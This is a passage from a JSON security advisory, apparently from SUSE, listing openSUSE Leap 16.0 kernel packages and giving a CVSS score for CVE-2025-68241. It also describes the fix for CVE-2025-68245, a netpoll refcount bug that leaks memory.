"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n - No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
